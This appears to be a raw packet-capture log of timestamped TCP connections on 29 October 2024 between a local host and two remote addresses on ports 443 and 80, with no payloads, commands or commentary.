                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.257102966 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.257419109 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.257422924 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.340513945 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.340703011 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.340804100 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.340982914 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.341016054 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.341065884 CET49749443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.341083050 CET4434974913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.343642950 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.343672037 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.344877958 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.344995022 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.345000029 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.351805925 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.351996899 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.352092981 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.352207899 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.352247000 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.352298021 CET49747443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.352313995 CET4434974713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.354284048 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.354331017 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.354409933 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.354527950 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.354542017 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.376992941 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.377619982 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.377680063 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.377804995 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.377813101 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.377836943 CET49748443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.377840996 CET4434974813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.386850119 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.388196945 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.388371944 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.391510963 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.391575098 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.391599894 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.391604900 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.391628981 CET49750443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.391632080 CET4434975013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.391669035 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.392436028 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.392448902 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.393838882 CET49755443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.393882036 CET4434975513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.393944979 CET49755443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.394251108 CET49755443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.394263029 CET4434975513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.662869930 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.663639069 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.663677931 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.664127111 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.664139986 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.790910006 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.793123007 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.793188095 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.793736935 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.793775082 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.793803930 CET49751443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.793819904 CET4434975113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.801136971 CET49756443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.801187038 CET4434975613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.801311970 CET49756443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.810456038 CET49756443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:22.810472965 CET4434975613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.066828012 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.114097118 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.123837948 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.126377106 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.126388073 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.129884005 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.137077093 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.137082100 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.137789965 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.137797117 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.139955044 CET4434975513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.143410921 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.143415928 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.143721104 CET49755443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.143744946 CET4434975513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.149594069 CET49755443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.149599075 CET4434975513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.176568031 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.219857931 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.219877005 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.220364094 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.220374107 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.262121916 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.262267113 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.262341022 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.269769907 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.269911051 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.270466089 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.277622938 CET4434975513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.277838945 CET4434975513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.277894020 CET49755443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.287065029 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.287081957 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.287092924 CET49752443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.287098885 CET4434975213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.288583994 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.288589954 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.288598061 CET49754443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.288604021 CET4434975413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.289761066 CET49755443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.289781094 CET4434975513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.289792061 CET49755443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.289798975 CET4434975513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.346895933 CET49757443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.346920013 CET4434975713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.347126007 CET49757443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.347579002 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.347713947 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.351198912 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.359055996 CET49757443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.359066010 CET4434975713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.359220028 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.359225988 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.359235048 CET49753443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.359237909 CET4434975313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.361500978 CET49758443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.361525059 CET4434975813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.361603975 CET49758443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.361705065 CET49758443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.361717939 CET4434975813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.362948895 CET49759443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.362961054 CET4434975913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.363183975 CET49759443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.364295959 CET49759443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.364301920 CET4434975913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.364408970 CET49760443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.364449978 CET4434976013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.364504099 CET49760443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.364646912 CET49760443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.364664078 CET4434976013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.574676991 CET4434975613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.575191975 CET49756443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.575212955 CET4434975613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.575691938 CET49756443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.575696945 CET4434975613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.707225084 CET4434975613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.707508087 CET4434975613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.707566977 CET49756443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.707648993 CET49756443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.707672119 CET4434975613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.707685947 CET49756443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.707693100 CET4434975613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.711664915 CET49761443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.711719036 CET4434976113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.711782932 CET49761443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.711990118 CET49761443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:23.712006092 CET4434976113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.211116076 CET4434975713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.211456060 CET4434975813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.211477995 CET4434975913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.211919069 CET49758443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.211976051 CET4434975813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.212091923 CET49757443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.212100983 CET4434975713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.212430000 CET49758443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.212443113 CET4434975813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.212671995 CET49759443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.212678909 CET4434975913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.213053942 CET49757443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.213059902 CET4434975713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.213285923 CET49759443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.213289976 CET4434975913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.213363886 CET4434976013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.213778019 CET49760443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.213871956 CET4434976013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.214350939 CET49760443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.214366913 CET4434976013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.341542959 CET4434975913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.341661930 CET4434975913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.341742992 CET49759443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.341933966 CET49759443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.341933966 CET49759443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.341947079 CET4434975913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.341953993 CET4434975913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.343653917 CET4434975813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.343815088 CET4434975813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.343897104 CET49758443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.343995094 CET49758443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.343995094 CET49758443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.344041109 CET4434975813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.344068050 CET4434975813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.344819069 CET4434975713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.344882011 CET4434975713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.344965935 CET49757443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.345155954 CET49757443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.345155954 CET49757443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.345161915 CET4434975713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.345169067 CET4434975713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.345240116 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.345292091 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.345360041 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.345901012 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.345938921 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.346499920 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.346609116 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.346689939 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.346808910 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.346828938 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.347150087 CET49764443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.347183943 CET4434976413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.347240925 CET49764443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.347372055 CET49764443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.347382069 CET4434976413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.351078987 CET4434976013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.351294994 CET4434976013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.351396084 CET49760443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.351434946 CET49760443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.351460934 CET4434976013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.351485968 CET49760443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.351499081 CET4434976013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.353610992 CET49765443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.353671074 CET4434976513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.353740931 CET49765443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.353840113 CET49765443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.353861094 CET4434976513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.454225063 CET4434976113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.454617023 CET49761443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.454648018 CET4434976113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.455034971 CET49761443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.455041885 CET4434976113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.586028099 CET4434976113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.586246967 CET4434976113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.586335897 CET49761443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.586566925 CET49761443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.586594105 CET4434976113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.586608887 CET49761443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.586616993 CET4434976113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.589451075 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.589498997 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.589608908 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.589867115 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.589879036 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.994469881 CET4971680192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:24.994746923 CET4976780192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.001816034 CET804971651.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.001961946 CET804976751.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.002044916 CET4976780192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.002243042 CET4976780192.168.2.551.81.194.202
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.007632971 CET804976751.81.194.202192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.297694921 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.298603058 CET4434976413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.298731089 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.298787117 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.298962116 CET49764443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.298995018 CET4434976413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.299211025 CET4434976513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.299283981 CET49762443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.299298048 CET4434976213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.299460888 CET49764443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.299465895 CET4434976413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.299563885 CET49765443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.299622059 CET4434976513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.299901962 CET49765443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.299913883 CET4434976513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.301902056 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.302220106 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.302295923 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.302557945 CET49763443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.302572966 CET4434976313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.421420097 CET4434976613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.421982050 CET49766443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                    Oct 29, 2024 13:08:25.422008038 CET4434976613.107.246.45192.168.2.5
